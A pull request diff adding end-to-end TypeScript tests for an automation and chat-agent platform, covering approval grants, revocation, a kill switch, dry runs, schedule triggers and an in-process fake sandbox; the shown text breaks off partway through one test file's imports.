### PR TITLE
E2E hardening wave: every block through public contracts against real neighbors (+3 product bugs fixed, +11 review fixes)

### DIFF
--- a/fixtures/automations-e2e/src/emit-and-revoke.e2e.test.ts
+++ b/fixtures/automations-e2e/src/emit-and-revoke.e2e.test.ts
@@ -1,0 +1,98 @@
+/** 07 §2 host-event scoping and 07 §3 revocation:
+ *  - emit fires only the EMITTING principal's automations, even when a second
+ *    principal has an enabled automation on the identical event name.
+ *  - revoking a captured grant disarms nothing; the next away run simply parks
+ *    pending-approval (the guard binding, not a cached decision, gates the run).
+ */
+import { beforeEach, describe, expect, it } from "vitest";
+import { automationDoc, createStack, ownerCtx, resetFixture } from "./harness.js";
+import { ADA, BOB, enableAndApprove, fixtureInvoices } from "./support.js";
+
+const listTrigger = {
+  on: { kind: "host-event" as const, event: "shared.event" },
+  run: { kind: "steps" as const, steps: [{ id: "list", tool: "host_invoices_list" }] },
+};
+
+describe("host-event scoping and grant revocation", () => {
+  beforeEach(resetFixture);
+
+  it("fires only the emitting principal's automation for a shared event name", async () => {
+    const stack = await createStack();
+    try {
+      const adaApp = "app_shared_ada";
+      const bobApp = "app_shared_bob";
+      await stack.putApp(ADA.subject, automationDoc({ id: adaApp, trigger: listTrigger }));
+      await stack.putApp(BOB.subject, automationDoc({ id: bobApp, trigger: listTrigger }));
+      await enableAndApprove(stack, adaApp, ownerCtx(ADA.subject, adaApp));
+      await enableAndApprove(stack, bobApp, ownerCtx(BOB.subject, bobApp));
+
+      const adaRuns = await stack.automations.emit("shared.event", {}, ADA);
+      expect(adaRuns).toHaveLength(1);
+
+      const byApp = await stack.sql<{ app_id: string; count: unknown }>(
+        "SELECT app_id, COUNT(*)::int AS count FROM vendo_runs GROUP BY app_id ORDER BY app_id",
+      );
+      expect(byApp.map(({ app_id, count }) => ({ app_id, count: Number(count) })))
+        .toEqual([{ app_id: adaApp, count: 1 }]);
+
+      // Bob's identically-named automation only fires for Bob's own emit.
+      const bobRuns = await stack.automations.emit("shared.event", {}, BOB);
+      expect(bobRuns).toHaveLength(1);
+      expect(Number((await stack.sql<{ count: unknown }>(
+        "SELECT COUNT(*)::int AS count FROM vendo_runs WHERE app_id = $1",
+        [bobApp],
+      ))[0]?.count)).toBe(1);
+    } finally {
+      await stack.close();
+    }
+  });
+
+  it("parks the next run after its standing grant is revoked", async () => {
+    const stack = await createStack();
+    try {
+      const appId = "app_revoke_park";
+      const ctx = ownerCtx(ADA.subject, appId);
+      await stack.putApp(ADA.subject, automationDoc({
+        id: appId,
+        trigger: {
+          on: { kind: "host-event", event: "invoice.autosend" },
+          run: { kind: "steps", steps: [{ id: "send", tool: "host_invoices_send", args: { id: "event.id" } }] },
+        },
+      }));
+      await enableAndApprove(stack, appId, ctx);
+
+      // First run: the captured grant authorizes the away send.
+      const first = await stack.automations.emit("invoice.autosend", { id: "inv_0003" }, ADA);
+      expect((await stack.automations.runs.get(first[0] ?? "", ctx))?.status).toBe("ok");
+      expect((await fixtureInvoices()).find(({ id }) => id === "inv_0003")?.status).toBe("open");
+
+      // Revoke the standing automation grant.
+      const grants = await stack.guard.grants.list(ADA);
+      const grant = grants.find((entry) => entry.appId === appId && entry.tool === "host_invoices_send");
+      if (!grant) throw new Error("automation grant not found");
+      await stack.guard.grants.revoke(grant.id, ADA);
+      expect((await stack.sql<{ revoked_at: unknown }>(
+        "SELECT revoked_at FROM vendo_grants WHERE id = $1",
+        [grant.id],
+      ))[0]?.revoked_at).toBeTruthy();
+
+      // Next run parks — revocation disarmed nothing, the run just asks again.
+      // A parked run never executed the tool: the send outcome is the
+      // pending-approval the guard returned in place of running it.
+      const second = await stack.automations.emit("invoice.autosend", { id: "inv_0003" }, ADA);
+      const secondId = second[0];
+      if (!secondId) throw new Error("second emit did not return a run id");
+      const secondRun = await stack.automations.runs.get(secondId, ctx);
+      expect(secondRun?.status).toBe("pending-approval");
+      expect(secondRun?.steps.at(-1)).toMatchObject({ tool: "host_invoices_send", outcome: "pending-approval" });
+      const away = (await stack.guard.approvals.pending(ADA)).find((request) =>
+        request.call.tool === "host_invoices_send"
+        && request.ctx.presence === "away"
+        && request.ctx.appId === appId
+      );
+      expect(away).toBeDefined();
+    } finally {
+      await stack.close();
+    }
+  });
+});

--- a/fixtures/automations-e2e/src/fn-machine.e2e.test.ts
+++ b/fixtures/automations-e2e/src/fn-machine.e2e.test.ts
@@ -1,0 +1,123 @@
+/** 07 §4 fn: steps through the REAL apps runtime against an in-process machine
+ * (fn-sandbox.ts). Proves the deterministic v0 rule end to end without a live
+ * key: a steps pipeline whose fn: step reaches a machine's POST /fn/<name>,
+ * with the event in its args, the { result } consumed by a later host tool via
+ * JSONata, and a machine { error } envelope hard-failing the run.
+ */
+import { beforeEach, describe, expect, it } from "vitest";
+import type { Json } from "@vendoai/core";
+import { automationDoc, createStack, ownerCtx, resetFixture } from "./harness.js";
+import { ADA, enableAndApprove, fixtureInvoices } from "./support.js";
+import { fnSandbox, type FnResponse } from "./fn-sandbox.js";
+
+function machine(name: string, args: Json): FnResponse {
+  const record = (args ?? {}) as Record<string, Json>;
+  if (name === "main") {
+    // 06 §4.1 success envelope: exactly one of { result } | { ui }.
+    return { status: 200, body: { result: { echo: record.note ?? null, from: "machine" } } as Json };
+  }
+  if (name === "boom") {
+    return { status: 500, body: { error: { code: "machine-broke", message: "kaboom" } } as Json };
+  }
+  return { status: 404, body: { error: { code: "not-found", message: `no fn ${name}` } } as Json };
+}
+
+describe("fn: steps through a real machine", () => {
+  beforeEach(resetFixture);
+
+  it("captures only the host tool on enable, feeds the machine result onward, and completes", async () => {
+    const stack = await createStack({ sandbox: fnSandbox(machine) });
+    try {
+      const appId = "app_fn_result";
+      const ctx = ownerCtx(ADA.subject, appId);
+      await stack.putApp(ADA.subject, {
+        ...automationDoc({
+          id: appId,
+          trigger: {
+            on: { kind: "host-event", event: "fn.ready" },
+            run: {
+              kind: "steps",
+              steps: [
+                { id: "main", tool: "fn:main", args: { note: "event.note" } },
+                {
+                  id: "record",
+                  tool: "host_invoices_create",
+                  args: {
+                    customerId: "'cus_ada'",
+                    amountCents: "1",
+                    currency: "'USD'",
+                    memo: "steps.main.echo & ' via ' & steps.main.from",
+                  },
+                },
+              ],
+            },
+          },
+        }),
+        server: "fake:snap",
+      });
+
+      // fn: refs need no grant — only the host write is captured (07 §3, §4).
+      const captured = await enableAndApprove(stack, appId, ctx);
+      expect(captured.map((request) => request.call.tool)).toEqual(["host_invoices_create"]);
+
+      const runIds = await stack.automations.emit("fn.ready", { note: "wave5" }, ADA);
+      const runId = runIds[0];
+      if (!runId) throw new Error("emit did not return a run id");
+      const run = await stack.automations.runs.get(runId, ctx);
+      expect(run?.status).toBe("ok");
+      expect(run?.steps.map(({ id, tool, outcome }) => ({ id, tool, outcome }))).toEqual([
+        { id: "main", tool: "fn:main", outcome: "ok" },
+        { id: "record", tool: "host_invoices_create", outcome: "ok" },
+      ]);
+      expect((await stack.sql<{ status: string }>("SELECT status FROM vendo_runs WHERE id = $1", [runId]))[0]?.status)
+        .toBe("ok");
+      expect((await fixtureInvoices()).find(({ memo }) => memo === "wave5 via machine"))
+        .toMatchObject({ amountCents: 1, customerId: "cus_ada" });
+    } finally {
+      await stack.close();
+    }
+  });
+
+  it("hard-fails the run on a machine error envelope and never reaches the later step", async () => {
+    const stack = await createStack({ sandbox: fnSandbox(machine) });
+    try {
+      const appId = "app_fn_error";
+      const ctx = ownerCtx(ADA.subject, appId);
+      await stack.putApp(ADA.subject, {
+        ...automationDoc({
+          id: appId,
+          trigger: {
+            on: { kind: "host-event", event: "fn.boom" },
+            run: {
+              kind: "steps",
+              steps: [
+                { id: "boom", tool: "fn:boom", args: {} },
+                {
+                  id: "record",
+                  tool: "host_invoices_create",
+                  args: { customerId: "'cus_ada'", amountCents: "1", memo: "'should never write'" },
+                },
+              ],
+            },
+          },
+        }),
+        server: "fake:snap",
+      });
+      await enableAndApprove(stack, appId, ctx);
+
+      const runIds = await stack.automations.emit("fn.boom", {}, ADA);
+      const runId = runIds[0];
+      if (!runId) throw new Error("emit did not return a run id");
+      const run = await stack.automations.runs.get(runId, ctx);
+      expect(run?.status).toBe("error");
+      expect(run?.error).toMatchObject({ code: "machine-broke", message: "kaboom" });
+      expect(run?.steps.map(({ id, outcome }) => ({ id, outcome }))).toEqual([{ id: "boom", outcome: "error" }]);
+      expect(run?.steps.some((step) => step.id === "record")).toBe(false);
+      expect((await fixtureInvoices()).some(({ memo }) => memo === "should never write")).toBe(false);
+      const stored = await stack.sql<{ status: string }>("SELECT status FROM vendo_runs WHERE id = $1", [runId]);
+      expect(stored[0]?.status).toBe("error");
+    } finally {
+      await stack.close();
+    }
+  });
+});

--- a/fixtures/automations-e2e/src/fn-sandbox.ts
+++ b/fixtures/automations-e2e/src/fn-sandbox.ts
@@ -1,0 +1,90 @@
+/** A fixture-local, in-process SandboxAdapter for the fn:-step e2e legs.
+ *
+ * The brief calls for "createApps with a FakeSandbox" to exercise the 07 §4
+ * fn: path through a REAL apps runtime while the user is away. The real
+ * FakeSandbox lives at packages/apps/src/testing, but @vendoai/apps exports
+ * only ".", "./e2b" and "./modal" — the testing subpath is not importable, and
+ * this lane may not touch packages/apps to add one. So we implement the frozen
+ * SandboxAdapter / SandboxMachine seam here: everything downstream of it — the
+ * apps runtime's machine session, run-token minting, /fn/<name> dispatch, and
+ * the { result } / { error } envelope parsing in call.ts — is the real code
+ * under test. Only the transport is in-process.
+ *
+ * The handler answers a POST /fn/<name> the way a machine would: a 2xx with a
+ * body is a success envelope (`{ result }` or `{ ui }`); a non-2xx with
+ * `{ error: { code, message } }` is the machine's failure envelope.
+ */
+import type { SandboxAdapter, SandboxMachine } from "@vendoai/apps";
+import type { Json } from "@vendoai/core";
+
+export interface FnResponse {
+  status: number;
+  body: Json;
+}
+
+export type FnHandler = (name: string, args: Json) => FnResponse | Promise<FnResponse>;
+
+const encoder = new TextEncoder();
+const decoder = new TextDecoder();
+
+const parseArgs = (body: Uint8Array | string | undefined): Json => {
+  if (body === undefined) return {};
+  const text = typeof body === "string" ? body : decoder.decode(body);
+  try {
+    const parsed = JSON.parse(text) as { args?: Json };
+    return parsed.args ?? {};
+  } catch {
+    return {};
+  }
+};
+
+/** Build a SandboxAdapter whose machine dispatches POST /fn/<name> to `handler`. */
+export function fnSandbox(handler: FnHandler): SandboxAdapter {
+  let counter = 0;
+  const makeMachine = (): SandboxMachine => {
+    const id = `fake_${counter++}`;
+    let stopped = false;
+    return {
+      id,
+      async request(req) {
+        if (stopped) throw new Error(`machine ${id} is stopped`);
+        const match = /^\/fn\/(.+)$/.exec(req.path);
+        const name = match?.[1] ?? "";
+        const { status, body } = await handler(name, parseArgs(req.body));
+        return {
+          status,
+          headers: { "content-type": "application/json" },
+          body: encoder.encode(JSON.stringify(body)),
+        };
+      },
+      async exec() {
+        return { code: 0, stdout: "", stderr: "" };
+      },
+      files: {
+        async read() {
+          throw new Error("fnSandbox has no file surface");
+        },
+        async write() {
+          /* no-op */
+        },
+        async list() {
+          return [];
+        },
+      },
+      async snapshot() {
+        return "fake:snap";
+      },
+      async stop() {
+        stopped = true;
+      },
+    };
+  };
+  return {
+    async create() {
+      return makeMachine();
+    },
+    async resume() {
+      return makeMachine();
+    },
+  };
+}

--- a/fixtures/automations-e2e/src/kill-switch.e2e.test.ts
+++ b/fixtures/automations-e2e/src/kill-switch.e2e.test.ts
@@ -1,0 +1,94 @@
+/** 07 §1 runs.stop — the kill switch. A run held mid-flight (inside a fn:
+ * step against an in-process machine) is cancelled best-effort: it is marked
+ * "stopped" with finishedAt set, steps after the stop never execute, stop is
+ * owner-scoped, and a terminal run cannot be stopped again.
+ */
+import { beforeEach, describe, expect, it } from "vitest";
+import type { Json } from "@vendoai/core";
+import { automationDoc, createStack, ownerCtx, resetFixture } from "./harness.js";
+import { ADA, BOB, fixtureInvoices, enableAndApprove } from "./support.js";
+import { fnSandbox } from "./fn-sandbox.js";
+
+describe("kill switch (runs.stop)", () => {
+  beforeEach(resetFixture);
+
+  it("cancels a held run mid-flight, skips later steps, and rejects owner/terminal misuse", async () => {
+    let releaseHold!: () => void;
+    const held = new Promise<void>((resolve) => { releaseHold = resolve; });
+    let signalStarted!: () => void;
+    const started = new Promise<void>((resolve) => { signalStarted = resolve; });
+
+    const stack = await createStack({
+      sandbox: fnSandbox(async (name) => {
+        if (name === "hold") {
+          signalStarted();
+          await held;
+          return { status: 200, body: { ok: true } as Json };
+        }
+        return { status: 404, body: { error: { code: "not-found", message: name } } as Json };
+      }),
+    });
+    try {
+      const appId = "app_kill_hold";
+      const ctx = ownerCtx(ADA.subject, appId);
+      await stack.putApp(ADA.subject, {
+        ...automationDoc({
+          id: appId,
+          trigger: {
+            on: { kind: "host-event", event: "kill.hold" },
+            run: {
+              kind: "steps",
+              steps: [
+                { id: "hold", tool: "fn:hold", args: {} },
+                {
+                  id: "record",
+                  tool: "host_invoices_create",
+                  args: { customerId: "'cus_ada'", amountCents: "1", memo: "'stopped-should-not-write'" },
+                },
+              ],
+            },
+          },
+        }),
+        server: "fake:snap",
+      });
+      await enableAndApprove(stack, appId, ctx);
+
+      const emitted = stack.automations.emit("kill.hold", {}, ADA);
+      await started;
+      const running = (await stack.automations.runs.list({ status: "running" }, ctx)).runs;
+      expect(running).toHaveLength(1);
+      const runId = running[0]?.id;
+      if (!runId) throw new Error("no running run to stop");
+
+      // Owner scoping: a non-owner cannot even see the run to stop it.
+      await expect(stack.automations.runs.stop(runId, ownerCtx(BOB.subject, appId)))
+        .rejects.toMatchObject({ code: "not-found" });
+
+      await stack.automations.runs.stop(runId, ctx);
+      releaseHold();
+      await emitted;
+
+      const run = await stack.automations.runs.get(runId, ctx);
+      expect(run?.status).toBe("stopped");
+      expect(run?.summary).toBe("stopped by user");
+      expect(run?.finishedAt).toBeTruthy();
+      expect(run?.steps.some((step) => step.id === "record")).toBe(false);
+
+      const stored = await stack.sql<{ status: string; finished_at: unknown }>(
+        "SELECT status, record->>'finishedAt' AS finished_at FROM vendo_runs WHERE id = $1",
+        [runId],
+      );
+      expect(stored[0]?.status).toBe("stopped");
+      expect(stored[0]?.finished_at).toBeTruthy();
+
+      // The later host write never ran.
+      expect((await fixtureInvoices()).some(({ memo }) => memo === "stopped-should-not-write")).toBe(false);
+
+      // Stopping an already-terminal run conflicts.
+      await expect(stack.automations.runs.stop(runId, ctx)).rejects.toMatchObject({ code: "conflict" });
+    } finally {
+      releaseHold();
+      await stack.close();
+    }
+  });
+});

--- a/fixtures/automations-e2e/src/observability.e2e.test.ts
+++ b/fixtures/automations-e2e/src/observability.e2e.test.ts
@@ -1,6 +1,6 @@
 import { beforeEach, describe, expect, it } from "vitest";
 import { automationDoc, createStack, ownerCtx, resetFixture } from "./harness.js";
-import { ADA, BOB, approve, tableCount } from "./support.js";
+import { ADA, BOB, approve, enableAndApprove, fixtureInvoices, tableCount } from "./support.js";
 
 describe("run observability and dry-run", () => {
   beforeEach(resetFixture);
@@ -104,6 +104,78 @@ describe("run observability and dry-run", () => {
       expect(postGrant.grantsMissing).toEqual([]);
       expect(await tableCount(stack, "vendo_runs")).toBe(runsBefore);
       expect(await tableCount(stack, "vendo_approvals")).toBe(approvalsBefore);
+    } finally {
+      await stack.close();
+    }
+  });
+
+  it("plans an agentic run across the whole bound surface and executes nothing", async () => {
+    const stack = await createStack();
+    try {
+      const appId = "app_observe_agentic_dry";
+      const ctx = ownerCtx(ADA.subject, appId);
+      await stack.putApp(ADA.subject, automationDoc({
+        id: appId,
+        trigger: { on: { kind: "host-event", event: "observe.agent" }, run: { kind: "agentic", prompt: "do the books" } },
+      }));
+      const runsBefore = await tableCount(stack, "vendo_runs");
+      const approvalsBefore = await tableCount(stack, "vendo_approvals");
+      const invoicesBefore = (await fixtureInvoices()).length;
+
+      const plan = await stack.automations.dryRun(appId, ctx);
+      // Without a model seat, agentic capture previews every bound descriptor.
+      expect(plan.steps.map(({ tool }) => tool).sort()).toEqual([
+        "host_invoices_create", "host_invoices_get", "host_invoices_list",
+        "host_invoices_send", "host_invoices_send_critical", "host_invoices_update",
+      ]);
+      expect(plan.steps.every(({ wouldAsk }) => wouldAsk)).toBe(true);
+      // The critical tool always asks, so it is not a "missing grant".
+      expect(plan.grantsMissing.slice().sort()).toEqual([
+        "host_invoices_create", "host_invoices_get", "host_invoices_list",
+        "host_invoices_send", "host_invoices_update",
+      ]);
+      expect(await tableCount(stack, "vendo_runs")).toBe(runsBefore);
+      expect(await tableCount(stack, "vendo_approvals")).toBe(approvalsBefore);
+      expect((await fixtureInvoices()).length).toBe(invoicesBefore);
+    } finally {
+      await stack.close();
+    }
+  });
+
+  it("previews a mutating steps pipeline without touching host state, even when granted", async () => {
+    const stack = await createStack();
+    try {
+      const appId = "app_observe_dry_sideeffect";
+      const ctx = ownerCtx(ADA.subject, appId);
+      await stack.putApp(ADA.subject, automationDoc({
+        id: appId,
+        trigger: {
+          on: { kind: "host-event", event: "observe.mutate" },
+          run: {
+            kind: "steps",
+            steps: [
+              {
+                id: "create",
+                tool: "host_invoices_create",
+                args: { customerId: "'cus_ada'", amountCents: "1", memo: "'dry-run-should-not-write'" },
+              },
+              { id: "send", tool: "host_invoices_send", args: { id: "'inv_0003'" } },
+            ],
+          },
+        },
+      }));
+      await enableAndApprove(stack, appId, ctx);
+      const runsBefore = await tableCount(stack, "vendo_runs");
+
+      const plan = await stack.automations.dryRun(appId, ctx, {});
+      expect(plan.steps.map(({ id, wouldAsk }) => ({ id, wouldAsk }))).toEqual([
+        { id: "create", wouldAsk: false },
+        { id: "send", wouldAsk: false },
+      ]);
+      // Nothing ran: no run row, no invoice created, inv_0003 still a draft.
+      expect(await tableCount(stack, "vendo_runs")).toBe(runsBefore);
+      expect((await fixtureInvoices()).some(({ memo }) => memo === "dry-run-should-not-write")).toBe(false);
+      expect((await fixtureInvoices()).find(({ id }) => id === "inv_0003")?.status).toBe("draft");
     } finally {
       await stack.close();
     }

--- a/fixtures/automations-e2e/src/schedule-extra.e2e.test.ts
+++ b/fixtures/automations-e2e/src/schedule-extra.e2e.test.ts
@@ -1,0 +1,107 @@
+/** 07 §2 schedule semantics the wave-4 baseline left thin: the `at` one-shot,
+ * cron missed-window collapse (host asleep across N>2 windows), and the
+ * start() auto-timer actually driving a real run and its stopper halting it.
+ */
+import { beforeEach, describe, expect, it } from "vitest";
+import { automationDoc, createStack, ownerCtx, resetFixture } from "./harness.js";
+import { ADA, enableAndApprove } from "./support.js";
+
+const listRun = { kind: "steps" as const, steps: [{ id: "list", tool: "host_invoices_list" }] };
+
+async function runCount(stack: Awaited<ReturnType<typeof createStack>>, appId: string): Promise<number> {
+  return Number((await stack.sql<{ count: unknown }>(
+    "SELECT COUNT(*)::int AS count FROM vendo_runs WHERE app_id = $1",
+    [appId],
+  ))[0]?.count);
+}
+
+describe("schedule trigger extras", () => {
+  beforeEach(resetFixture);
+
+  it("fires an `at` one-shot exactly once and never again, gated by enable/disable", async () => {
+    let clock = new Date("2026-07-12T09:00:00.000Z");
+    const stack = await createStack({ now: () => clock });
+    try {
+      const appId = "app_at_oneshot";
+      const ctx = ownerCtx(ADA.subject, appId);
+      await stack.putApp(ADA.subject, automationDoc({
+        id: appId,
+        trigger: { on: { kind: "schedule", at: "2026-07-12T08:30:00.000Z" }, run: listRun },
+      }));
+
+      // Disarmed: a due `at` on a disabled automation does not fire.
+      expect(await stack.automations.tick(clock)).toEqual([]);
+
+      await enableAndApprove(stack, appId, ctx);
+      expect(await stack.automations.tick(clock)).toHaveLength(1);
+      // Same and later ticks never re-fire the one-shot.
+      expect(await stack.automations.tick(clock)).toEqual([]);
+      clock = new Date("2026-07-12T10:00:00.000Z");
+      expect(await stack.automations.tick(clock)).toEqual([]);
+
+      await stack.automations.disable(appId, ctx);
+      expect(await stack.automations.tick(clock)).toEqual([]);
+      expect(await runCount(stack, appId)).toBe(1);
+    } finally {
+      await stack.close();
+    }
+  });
+
+  it("collapses a cron backlog of many missed windows into a single run", async () => {
+    let clock = new Date("2026-07-12T00:00:00.000Z");
+    const stack = await createStack({ now: () => clock });
+    try {
+      const appId = "app_cron_collapse";
+      const ctx = ownerCtx(ADA.subject, appId);
+      await stack.putApp(ADA.subject, automationDoc({
+        id: appId,
+        trigger: { on: { kind: "schedule", cron: "0 * * * *" }, run: listRun },
+      }));
+      await enableAndApprove(stack, appId, ctx); // cursor anchored at 00:00
+
+      // Host asleep until 03:00 — the 01:00, 02:00 and 03:00 windows all missed.
+      clock = new Date("2026-07-12T03:00:00.000Z");
+      expect(await stack.automations.tick(clock)).toHaveLength(1); // exactly one, no back-fill
+      expect(await stack.automations.tick(clock)).toEqual([]);     // next window (04:00) not yet due
+      expect(await runCount(stack, appId)).toBe(1);
+    } finally {
+      await stack.close();
+    }
+  });
+
+  it("start() drives a due schedule on its own timer and the stopper halts it", async () => {
+    let clock = new Date("2026-07-12T00:00:00.000Z");
+    const stack = await createStack({ now: () => clock });
+    try {
+      const appId = "app_start_timer";
+      const ctx = ownerCtx(ADA.subject, appId);
+      await stack.putApp(ADA.subject, automationDoc({
+        id: appId,
+        trigger: { on: { kind: "schedule", every: "1s" }, run: listRun },
+      }));
+      await enableAndApprove(stack, appId, ctx); // cursor anchored at 00:00
+
+      // Advance one window into the future, then let the auto-timer notice it.
+      clock = new Date("2026-07-12T00:00:02.000Z");
+      const stop = stack.automations.start(20);
+      try {
+        const deadline = Date.now() + 5_000;
+        while (Date.now() < deadline && (await runCount(stack, appId)) < 1) {
+          await new Promise((resolve) => setTimeout(resolve, 25));
+        }
+        expect(await runCount(stack, appId)).toBe(1);
+      } finally {
+        stop();
+      }
+
+      // Stopper halts the timer: advancing the clock past more windows yields no
+      // further runs because tick() is never invoked again.
+      const afterStop = await runCount(stack, appId);
+      clock = new Date("2026-07-12T00:00:30.000Z");
+      await new Promise((resolve) => setTimeout(resolve, 200));
+      expect(await runCount(stack, appId)).toBe(afterStop);
+    } finally {
+      await stack.close();
+    }
+  });
+});

--- a/fixtures/chat-e2e/package.json
+++ b/fixtures/chat-e2e/package.json
@@ -1,0 +1,26 @@
+{
+  "name": "@vendoai-fixtures/chat-e2e",
+  "version": "0.0.0",
+  "private": true,
+  "description": "Cross-block chat-path e2e harness: real @vendoai/agent + real guard.bind + real store (PGlite), a scripted deterministic LanguageModel, side effects asserted with raw SQL over the vendo_* tables — the integration the layering rule forbids inside packages/agent.",
+  "type": "module",
+  "engines": {
+    "node": ">=20"
+  },
+  "scripts": {
+    "test": "vitest run --passWithNoTests",
+    "typecheck": "tsc -p tsconfig.json --noEmit"
+  },
+  "dependencies": {
+    "@vendoai/agent": "workspace:*",
+    "@vendoai/core": "workspace:*",
+    "@vendoai/guard": "workspace:*",
+    "@vendoai/store": "workspace:*"
+  },
+  "devDependencies": {
+    "@types/node": "^22.0.0",
+    "ai": "^6.0.0",
+    "typescript": "^5.6.0",
+    "vitest": "^2.1.0"
+  }
+}

--- a/fixtures/chat-e2e/src/approval-roundtrip.e2e.test.ts
+++ b/fixtures/chat-e2e/src/approval-roundtrip.e2e.test.ts
@@ -1,0 +1,143 @@
+/** Scenario 1 — FULL APPROVAL ROUND-TRIP across the real chat path.
+ *
+ * scripted model calls a tool a policy rule asks on → the stream surfaces the
+ * ai-SDK approval + the VendoApprovalPart → SQL shows a pending vendo_approvals
+ * row → guard.approvals.decide(approve, remember standing tool-scope) → resume
+ * → the tool runs exactly once → the approval is decided/consumed, a
+ * vendo_grants row is minted source "chat", the audit trail records it → a
+ * SECOND turn calling the same tool matches the grant and runs without asking.
+ */
+import { afterEach, describe, expect, it } from "vitest";
+import {
+  createEnv,
+  descriptor,
+  lastAssistant,
+  partsOfType,
+  readSse,
+  respondToApproval,
+  scriptedModel,
+  SpyRegistry,
+  textTurn,
+  toolCallTurn,
+  userCtx,
+  userMessage,
+  vendoApprovalId,
+  auditEvents,
+  type Env,
+} from "./harness.js";
+
+const SUBJECT = "user_ada";
+const THREAD = "thr_roundtrip";
+const TOOL = "host_invoices_send";
+const input1 = { invoiceId: "inv_1" };
+const input2 = { invoiceId: "inv_2" };
+
+const send = descriptor({ name: TOOL, risk: "write" });
+
+let env: Env;
+afterEach(async () => {
+  await env?.close();
+});
+
+describe("scenario 1: full approval round-trip", () => {
+  it("asks, mints a standing grant on approve, runs once, then runs the second call without asking", async () => {
+    env = await createEnv({ policy: { rules: [{ match: { tool: TOOL }, action: "ask" }] } });
+    const registry = new SpyRegistry([send], { [TOOL]: { sent: true } });
+    const model = scriptedModel([
+      toolCallTurn(TOOL, input1, "call_1"), // stream #1: pauses on approval
+      textTurn("Sent the invoice.", "t1"), //  stream #2 (resume): after execute
+      toolCallTurn(TOOL, input2, "call_2"), // stream #3: runs via grant
+      textTurn("Sent again.", "t2"), //          stream #3 continues after run
+    ]);
+    const agent = env.agentFor(registry, model);
+    const ctx = userCtx(SUBJECT);
+
+    // --- Turn 1: model calls the tool, the turn pauses on approval ----------
+    const paused = await readSse(
+      await agent.stream({ threadId: THREAD, message: userMessage("u1", "Send invoice 1"), ctx }),
+    );
+
+    expect(partsOfType(paused, "tool-approval-request")[0]).toMatchObject({ toolCallId: "call_1" });
+    const vendoPart = partsOfType(paused, "data-vendo-approval")[0];
+    expect(vendoPart).toMatchObject({ toolCallId: "call_1", risk: "write" });
+    expect(String(vendoPart!.approvalId)).toMatch(/^apr_/);
+    expect(paused.parts.at(-1)).toEqual({ type: "finish", finishReason: "tool-calls" });
+    // Nothing executed; exactly one pending approval on disk.
+    expect(registry.count(TOOL)).toBe(0);
+    expect(await env.count("vendo_approvals")).toBe(1);
+    const pendingRow = await env.sql<{ status: string; subject: string }>(
+      "SELECT status, subject FROM vendo_approvals",
+    );
+    expect(pendingRow[0]).toEqual({ status: "pending", subject: SUBJECT });
+
+    const approvalId = vendoApprovalId(paused);
+    const pending = await env.guard.approvals.pending(ctx.principal);
+    expect(pending.map((request) => request.id)).toEqual([approvalId]);
+
+    // --- Decide: approve + remember a standing tool-scope grant -------------
+    await env.guard.approvals.decide(
+      approvalId,
+      { approve: true, remember: { scope: { kind: "tool" }, duration: "standing" } },
+      ctx.principal,
+    );
+
+    const approvalRow = await env.sql<{ status: string }>(
+      "SELECT status FROM vendo_approvals WHERE id = $1",
+      [approvalId],
+    );
+    expect(approvalRow[0]?.status).toBe("approved");
+
+    const grants = await env.sql<{ subject: string; tool: string; source: string; app_id: string | null; duration: string }>(
+      "SELECT subject, tool, source, app_id, duration FROM vendo_grants",
+    );
+    expect(grants).toEqual([
+      { subject: SUBJECT, tool: TOOL, source: "chat", app_id: null, duration: "standing" },
+    ]);
+
+    // --- Turn 2: resume the paused turn; the tool runs exactly once ---------
+    const assistant = await lastAssistant(agent, THREAD, ctx);
+    const resumed = await readSse(
+      await agent.stream({
+        threadId: THREAD,
+        message: respondToApproval(assistant, "call_1", TOOL, input1, true),
+        ctx,
+      }),
+    );
+
+    expect(registry.count(TOOL)).toBe(1);
+    expect(partsOfType(resumed, "tool-output-available")[0]).toMatchObject({
+      toolCallId: "call_1",
+      output: { status: "ok", output: { sent: true } },
+    });
+    expect(resumed.parts.some((part) => part.type === "text-delta" && part.delta === "Sent the invoice.")).toBe(true);
+
+    const consumed = await env.sql<{ consumed_at: unknown }>(
+      "SELECT consumed_at FROM vendo_approvals WHERE id = $1",
+      [approvalId],
+    );
+    expect(consumed[0]?.consumed_at).not.toBeNull();
+
+    // Audit trail: an approval event, the decide event, and the executed
+    // tool-call (decidedBy grant — the consumed approval authorized it).
+    const events = await auditEvents(env, SUBJECT);
+    const toolCall = events.find((event) => event.kind === "tool-call");
+    expect(toolCall).toMatchObject({ tool: TOOL, outcome: "ok", decidedBy: "grant" });
+    expect(events.some((event) => event.kind === "approval" && event.outcome === "pending-approval")).toBe(true);
+    expect(
+      events.some(
+        (event) =>
+          event.kind === "approval"
+          && (event.detail as { approved?: boolean } | undefined)?.approved === true,
+      ),
+    ).toBe(true);
+
+    // --- Turn 3: a fresh call to the same tool matches the grant ------------
+    const secondTurn = await readSse(
+      await agent.stream({ threadId: THREAD, message: userMessage("u2", "Send invoice 2"), ctx }),
+    );
+    expect(partsOfType(secondTurn, "tool-approval-request")).toHaveLength(0);
+    expect(registry.count(TOOL)).toBe(2);
+    // No new approval row: the grant answered the second call.
+    expect(await env.count("vendo_approvals")).toBe(1);
+  });
+});

--- a/fixtures/chat-e2e/src/away-runner.e2e.test.ts
+++ b/fixtures/chat-e2e/src/away-runner.e2e.test.ts
@@ -1,0 +1,158 @@
+/** Scenario 6 — AWAY RUNNER PARK + RESUME, and the 05 §6 boundary.
+ *
+ * agent.asRunner() runs the same loop with presence "away": an ungranted write
+ * parks as pending-approval and the run fails soft (it does not throw). The
+ * scenario then pins the exact 05 §6 rule through the full runner stream:
+ *
+ *   - A grant minted by deciding a chat/away approval (ApprovalDecision.remember
+ *     → source "chat", core §5) is appId-bound but does NOT authorize away
+ *     execution — away runs hold only "automation"-source, app-bound grants
+ *     (05 §6). So a subsequent away run still parks.
+ *   - A source "automation", app-bound grant (what automation enable-capture
+ *     mints, 07 §3) DOES authorize the away run — it then succeeds without asking.
+ *   - A chat grant with no appId never authorizes an away run either.
+ *
+ * (The happy "decide → next away firing runs" path is the automations block's
+ * enable-capture, covered by fixtures/automations-e2e; deciding a parked
+ * approval here mints source "chat" by contract, which is deliberately
+ * insufficient for away — that is the property this scenario verifies.)
+ */
+import { afterEach, describe, expect, it } from "vitest";
+import type { AgentRunReport, RunContext, ToolRegistry } from "@vendoai/core";
+import type { LanguageModel } from "ai";
+import {
+  createEnv,
+  descriptor,
+  scriptedModel,
+  seedGrant,
+  SpyRegistry,
+  textTurn,
+  toolCallTurn,
+  userCtx,
